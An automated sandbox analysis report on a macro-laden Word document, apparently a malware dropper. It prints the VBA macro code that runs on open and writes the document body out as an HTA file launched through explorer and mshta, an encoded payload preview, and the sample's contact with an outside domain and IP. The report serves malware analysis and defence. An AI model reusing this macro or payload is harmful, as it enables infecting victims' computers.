                Preview: <html><body><div id='youGirlYou' style='font-color: #000'>lave</div><div id='karolLikeDow' style='font-color: #000'>2FmcgcWayxGTptWZE92byBSPg4WZ3BSQjRXa2VGWPJmalNGdoISbzhXbsJjL41GboRHdwJSK7cWayxGTptWZE92by5ybwVmboIyRFRlIsAiIoRHdwpzLvMHavVHbkVmclxGbp9Gd0RmLj9WbvI2bvx2avEFbhp0a4MkN2lVcJlXR3JGZ5BnQIZ3M5pkUvcncXdlTDR0L3cDNyczLiVmY5NHO/MWak1jQtlzYBBlJ3BFO6h2aL1TYOx0QzImSDhmWNVzRhVXSCZSPTBTTSN1NyoWc0t2TSh3SBNTaVtmakNlIsAiZhx2cllyOnlmcsxUarVGRv9mcuMXZuRGKpsTamhyZpJHbMl2alR0bvJnLzRXY0V3cg0TPgIDMwkye0JXe7ZXYyByahJ3bsl1b1dUayxGI9AibldHIBNGdpZXZY9kYqV2Y0hiIhR2bkJmLzRnclFWbikyOrFmcvxWWvV3RpJHbu8Gcl52OrFmcvxWWvV3RpJHbuQXewVGI9ASM7sWYy9GbZ9WdHlmcs5ydylGdlhyZpJHbMl2alR0bvJnLyV2cw9mbzVmYvRWepszahJ3bsl1b1dUayxmLzFmdlR3bmlGblhiIjpDXcV3clJ3ccxFc1JGbpNGXcRXdiV2RpJHbM9WYk5iawdmIsAiMpszahJ3bsl1b1dUayxmLjx2bzV2O9NWY0NGaoUWK71Xf|||==gdhJHInlmcsxUarVGTvZXZg0DIuV2dgE0Y0lmdlh1TipWZjRHKic3cjJXawRnLzhWZsxmIpsjdhJHI59WdQ92dUVnYlBSPg4WZ3BSQjRXa2VGWPJmalNGdoIycjJXawRXaudmLmlGblNXezRXZt9mYqV2Y0JSK7cWayxGTptWZM9mdl5ic1

                Static File Info

                General

                File type:Microsoft Word 2007+
                Entropy (8bit):7.793957028458385
                TrID:
                • Word Microsoft Office Open XML Format document with Macro (52004/1) 33.99%
                • Word Microsoft Office Open XML Format document (49504/1) 32.35%
                • Word Microsoft Office Open XML Format document (43504/1) 28.43%
                • ZIP compressed archive (8000/1) 5.23%
                File name:instruct_11.21.doc.docm
                File size:34817
                MD5:a9490d94cf547e27dcc0d52dc72e74e7
                SHA1:a00e440eb13f84c8b8faba5b81a7d85fce2a4074
                SHA256:ee103f8d64cd8fa884ff6a041db2f7aa403c502f54e26337c606044c2f205394
                SHA512:43dddc14679f16735c6f74c1b3d40b0be23bf995e9dd9a49ab9cd780cac6314a15ce73ab3943cf3346bbc77be2b2355ac6a8723c56d1ebe6872c9697f5048bc4
                SSDEEP:384:xS6JqYxSJTvfpHhx/gFj0EEYpcVhE1ltmTV/YZO4NSCWl822TnUCSdQQUfwliiid:ZJqY0phb4a02VWnZdw9822zAEhXd
                File Content Preview:PK..........!...O.............[Content_Types].xml ...(.........................................................................................................................................................................................................

                File Icon

                Icon Hash:e4e6a2a2acbcbcac

                Static OLE Info

                General

                Document Type:OpenXML
                Number of OLE Files:1

                OLE File "/opt/package/joesandbox/database/analysis/520837/sample/instruct_11.21.doc.docm"

                Indicators

                Has Summary Info:False
                Application Name:unknown
                Encrypted Document:False
                Contains Word Document Stream:
                Contains Workbook/Book Stream:
                Contains PowerPoint Document Stream:
                Contains Visio Document Stream:
                Contains ObjectPool Stream:
                Flash Objects Count:
                Contains VBA Macros:True

                Summary

                Title:
                Subject:
                Author:ozdgjmh
                Keywords:ath.txeNwoPwop\cilbup\sresu\:c
                Template:Normal
                Last Saved By:&#1055;&#1086;&#1083;&#1100;&#1079;&#1086;&#1074;&#1072;&#1090;&#1077;&#1083;&#1100; Windows
                Revion Number:2
                Total Edit Time:0
                Create Time:2021-11-10T09:34:00Z
                Last Saved Time:2021-11-10T09:34:00Z
                Number of Pages:1
                Number of Words:116
                Number of Characters:9917
                Creating Application:Microsoft Office Word
                Security:0

                Document Summary

                Number of Lines:42
                Number of Paragraphs:1
                Thumbnail Scaling Desired:false
                Company:
                Contains Dirty Links:false
                Shared Document:false
                Changed Hyperlinks:false
                Application Version:16.0000

                Streams with VBA

                VBA File Name: ThisDocument.cls, Stream Size: 2271
                General
                Stream Path:VBA/ThisDocument
                VBA File Name:ThisDocument.cls
                Stream Size:2271
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . L / . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . p . . . . . . . . l . m . E . , l R . . . D . m 7 ^ e . . F . s 2 Z . g w . . . . . . . . . . . . . . . . . . . . . | . . K . . . K . . ; . > . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . | . . K . . . K . . ; . > . | . . . . l . m . E . , l R . . . D . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . .
                Data Raw:01 16 03 00 06 00 01 00 00 b4 04 00 00 e4 00 00 00 ea 01 00 00 e2 04 00 00 f0 04 00 00 e4 06 00 00 03 00 00 00 01 00 00 00 4c 2f ec fa 00 00 ff ff a3 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 70 00 ff ff 00 00 d6 0d 8e 6c a5 6d c7 45 97 2c 6c 52 13 2e a9 44 06 6d 37 5e 65 13 f2 46 b7 73 32 5a ed 67 77 90 00 00 00 00 00 00 00 00 00 00 00 00 00
                VBA Code
                Attribute VB_Name = "ThisDocument"
                Attribute VB_Base = "1Normal.ThisDocument"
                Attribute VB_GlobalNameSpace = False
                Attribute VB_Creatable = False
                Attribute VB_PredeclaredId = True
                Attribute VB_Exposed = True
                Attribute VB_TemplateDerived = True
                Attribute VB_Customizable = True
                Function keywords()
                With ActiveDocument
                girlKarolGirl = .BuiltInDocumentProperties("keywords").Value
                End With
                keywords = StrReverse(girlKarolGirl)
                ActiveDocument.Content.Find.Execute FindText:="$1", ReplaceWith:=dowKarolYou, Replace:=wdReplaceAll
                End Function
                Public Function s(dowGirlLoad)
                Set dowYouKarol = CreateObject("wscript.shell")
                dowYouKarol.exec "c:\windows\explorer " & dowGirlLoad
                End Function
                Sub document_open()
                main.karoline ("")
                End Sub
                VBA File Name: main.bas, Stream Size: 1122
                General
                Stream Path:VBA/main
                VBA File Name:main.bas
                Stream Size:1122
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . L / . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                Data Raw:01 16 03 00 00 f0 00 00 00 9a 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff a1 02 00 00 a1 03 00 00 00 00 00 00 01 00 00 00 4c 2f 2e e2 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                VBA Code
                Attribute VB_Name = "main"
                Public Sub karoline(likeTubeLike)
                doorLikeDow = ThisDocument.keywords
                With ActiveDocument
                .SaveAs2 FileName:=doorLikeDow, FileFormat:=2
                End With
                ThisDocument.s doorLikeDow
                End Sub

                Streams

                Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 394
                General
                Stream Path:PROJECT
                File Type:ASCII text, with CRLF line terminators
                Stream Size:394
                Entropy:5.28471344287
                Base64 Encoded:True
                Data ASCII:I D = " { A A 3 4 7 5 E 1 - 1 0 B 7 - 4 6 7 2 - 9 5 8 4 - C 9 3 4 8 5 4 D 1 D 0 2 } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . M o d u l e = m a i n . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " B 1 B 3 2 C 5 4 3 0 5 4 3 0 5 4 3 0 5 4 3 0 " . . D P B = " 6 2 6 0 F F 4 C B 1 4 D B 1 4 D B 1 " . . G C = " 1 3 1 1 8 E 1 F 3 E 2 0 3 E 2 0 C 1 " . . . . [ H o s t E x t e n d e
                Data Raw:49 44 3d 22 7b 41 41 33 34 37 35 45 31 2d 31 30 42 37 2d 34 36 37 32 2d 39 35 38 34 2d 43 39 33 34 38 35 34 44 31 44 30 32 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 6d 61 69 6e 0d 0a 4e 61 6d 65 3d 22 50 72 6f 6a 65 63 74 22 0d 0a 48 65 6c 70 43 6f 6e 74 65 78 74 49 44 3d 22 30 22 0d 0a 56
                Stream Path: PROJECTwm, File Type: data, Stream Size: 56
                General
                Stream Path:PROJECTwm
                File Type:data
                Stream Size:56
                Entropy:3.05665670746
                Base64 Encoded:False
                Data ASCII:T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . m a i n . m . a . i . n . . . . .
                Data Raw:54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 6d 61 69 6e 00 6d 00 61 00 69 00 6e 00 00 00 00 00
                Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 3229
                General
                Stream Path:VBA/_VBA_PROJECT
                File Type:data
                Stream Size:3229
                Entropy:4.37746268314
                Base64 Encoded:False
                Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 1 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c .
                Data Raw:cc 61 b2 00 00 03 00 ff 19 04 00 00 09 04 00 00 e3 04 03 00 00 00 00 00 00 00 00 00 01 00 06 00 02 00 fe 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
                Stream Path: VBA/__SRP_0, File Type: data, Stream Size: 1874
                General
                Stream Path:VBA/__SRP_0
                File Type:data
                Stream Size:1874
                Entropy:3.57587931409
                Base64 Encoded:False
                Data ASCII:. K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * \\ C N o r m a l r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ V . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . u . O . ) . 2 . . X + . . .
                Data Raw:93 4b 2a b2 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 00 00 00 00 00 00 01 00 02 00 00 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 01 00 09 00 00 00 2a 5c 43 4e 6f 72 6d 61 6c 72 55 c0 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00 00 00 00
                Stream Path: VBA/__SRP_1, File Type: data, Stream Size: 209
                General
                Stream Path:VBA/__SRP_1
                File Type:data
                Stream Size:209
                Entropy:2.03643843122
                Base64 Encoded:False
                Data ASCII:r U @ . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . d o w G i r l L o a d \\ . . . . . . . . . . . . . . .
                Data Raw:72 55 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 02 00 00 00 00 00 00 7e 7a 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 ff ff ff ff ff ff ff ff 06 00 00 00 00 00
                Stream Path: VBA/__SRP_2, File Type: data, Stream Size: 835
                General
                Stream Path:VBA/__SRP_2
                File Type:data
                Stream Size:835
                Entropy:2.00768639044
                Base64 Encoded:False
                Data ASCII:r U . . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` . . . a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` i . . . . . . . . . . . . . . . . . . . . . . . . . . .
                Data Raw:72 55 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 50 00 00 00 00 00 00 00 00 00 00 00 03 00 03 00 00 00 00 00 01 00 01 00 00 00 01 00 d1 08 00 00 00 00 00 00 00 00 00 00 01 09 00 00 00 00 00 00 00 00 00 00 31 09
                Stream Path: VBA/__SRP_3, File Type: data, Stream Size: 290
                General
                Stream Path:VBA/__SRP_3
                File Type:data
                Stream Size:290
                Entropy:2.16919875755
                Base64 Encoded:False
                Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . @ . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O . P . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O . O . 8 . . . . . . . . . . . . . . . . ` . . . . 8 . . . . . . . . . . . . . . .
                Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 78 00 00 00 08 00 40 00 e1 01 00 00 00 00 00 00 00 00 02 00 00 00 04 60 04 01 e1 0d ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00
                Stream Path: VBA/dir, File Type: data, Stream Size: 711
                General
                Stream Path:VBA/dir
                File Type:data
                Stream Size:711
                Entropy:6.38404585368
                Base64 Encoded:True
                Data ASCII:. . . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . . l . . . . . . . . . @ Y . c . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 . 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s t e m 3 . 2 \\ . e 2 . t l b . # O L E A u t . o m a t i o n . ` . . . . E N o r m a l . . E N . C r . m . a Q . F . . . . . . . * , \\ C . . . . ? . m . .
                Data Raw:01 c3 b2 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e3 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 40 59 83 63 0e 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30

                Network Behavior

                Network Port Distribution

                TCP Packets

                TimestampSource PortDest PortSource IPDest IP
                Nov 12, 2021 21:19:29.305022955 CET4916580192.168.2.22194.62.42.144
                Nov 12, 2021 21:19:32.307112932 CET4916580192.168.2.22194.62.42.144
                Nov 12, 2021 21:19:38.313657045 CET4916580192.168.2.22194.62.42.144

                UDP Packets

                TimestampSource PortDest PortSource IPDest IP
                Nov 12, 2021 21:19:28.889834881 CET5216753192.168.2.228.8.8.8
                Nov 12, 2021 21:19:28.937772989 CET53521678.8.8.8192.168.2.22

                DNS Queries

                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                Nov 12, 2021 21:19:28.889834881 CET192.168.2.228.8.8.80x6451Standard query (0)shoulderelliottd.comA (IP address)IN (0x0001)

                DNS Answers

                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                Nov 12, 2021 21:19:28.937772989 CET8.8.8.8192.168.2.220x6451No error (0)shoulderelliottd.com194.62.42.144A (IP address)IN (0x0001)

                Code Manipulations

                Statistics

                CPU Usage

                Click to jump to process

                Memory Usage

                Click to jump to process

                High Level Behavior Distribution

                Click to dive into process behavior distribution

                Behavior

                Click to jump to process

                System Behavior

                General

                Start time:21:19:16
                Start date:12/11/2021
                Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                Wow64 process (32bit):false
                Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                Imagebase:0x13f2e0000
                File size:1423704 bytes
                MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:21:19:20
                Start date:12/11/2021
                Path:C:\Windows\explorer.exe
                Wow64 process (32bit):false
                Commandline:c:\windows\explorer c:\users\public\powPowNext.hta
                Imagebase:0xffa10000
                File size:3229696 bytes
                MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:21:19:20
                Start date:12/11/2021
                Path:C:\Windows\explorer.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                Imagebase:0xffa10000
                File size:3229696 bytes
                MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:21:19:21
                Start date:12/11/2021
                Path:C:\Windows\SysWOW64\mshta.exe
                Wow64 process (32bit):true
                Commandline:"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Public\powPowNext.hta"
                Imagebase:0xd40000
                File size:13312 bytes
                MD5 hash:ABDFC692D9FE43E2BA8FE6CB5A8CB95A
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                Disassembly

                Code Analysis

                Reset < >

                  Executed Functions

                  Memory Dump Source
                  • Source File: 00000004.00000003.465038109.0000000002B00000.00000010.00000001.sdmp, Offset: 02B00000, based on PE: false
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: f6937b0f6e4796e53302bfaf4f5259f35123f2f05f922ce79dad98c0efd1a1dc
                  • Instruction ID: 320621ba4f9566e70d2573b316919a986b966162324a39c683831bd112142292
                  • Opcode Fuzzy Hash: f6937b0f6e4796e53302bfaf4f5259f35123f2f05f922ce79dad98c0efd1a1dc
                  • Instruction Fuzzy Hash:
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000004.00000003.465038109.0000000002B00000.00000010.00000001.sdmp, Offset: 02B00000, based on PE: false
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: f6937b0f6e4796e53302bfaf4f5259f35123f2f05f922ce79dad98c0efd1a1dc
                  • Instruction ID: 320621ba4f9566e70d2573b316919a986b966162324a39c683831bd112142292
                  • Opcode Fuzzy Hash: f6937b0f6e4796e53302bfaf4f5259f35123f2f05f922ce79dad98c0efd1a1dc
                  • Instruction Fuzzy Hash:
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000004.00000003.465038109.0000000002B00000.00000010.00000001.sdmp, Offset: 02B00000, based on PE: false
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: f6937b0f6e4796e53302bfaf4f5259f35123f2f05f922ce79dad98c0efd1a1dc
                  • Instruction ID: 320621ba4f9566e70d2573b316919a986b966162324a39c683831bd112142292
                  • Opcode Fuzzy Hash: f6937b0f6e4796e53302bfaf4f5259f35123f2f05f922ce79dad98c0efd1a1dc
                  • Instruction Fuzzy Hash:
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000004.00000003.465038109.0000000002B00000.00000010.00000001.sdmp, Offset: 02B00000, based on PE: false
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: f6937b0f6e4796e53302bfaf4f5259f35123f2f05f922ce79dad98c0efd1a1dc
                  • Instruction ID: 320621ba4f9566e70d2573b316919a986b966162324a39c683831bd112142292
                  • Opcode Fuzzy Hash: f6937b0f6e4796e53302bfaf4f5259f35123f2f05f922ce79dad98c0efd1a1dc
                  • Instruction Fuzzy Hash:
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000004.00000003.465038109.0000000002B00000.00000010.00000001.sdmp, Offset: 02B00000, based on PE: false
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: f6937b0f6e4796e53302bfaf4f5259f35123f2f05f922ce79dad98c0efd1a1dc
                  • Instruction ID: 320621ba4f9566e70d2573b316919a986b966162324a39c683831bd112142292
                  • Opcode Fuzzy Hash: f6937b0f6e4796e53302bfaf4f5259f35123f2f05f922ce79dad98c0efd1a1dc
                  • Instruction Fuzzy Hash:
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Non-executed Functions